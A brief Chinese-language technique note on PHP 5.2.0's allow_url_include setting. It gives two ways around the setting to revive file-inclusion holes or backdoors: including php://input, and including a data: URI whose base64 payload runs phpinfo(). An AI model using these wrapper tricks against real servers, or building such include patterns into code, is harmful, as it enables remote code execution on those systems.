http://www.php.net/ChangeLog-5.php#5.2.0
Added allow_url_include ini directive to complement allow_url_fopen. (Rasmus)
也就是说,远程包含文件漏洞,或者是后门,变的很难奏效了。
不过同样有两种方式绕过。
一个是:
include ("php://input");
另一种方式只在5.2.0版本以上才支持:
include ("data:;base64,PD9waHAgcGhwaW5mbygpOz8+"); //phpinfo()
Refence:
http://cn.php.net/manual/en/wrappers.data.phphttp://www.faqs.org/rfcs/rfc2397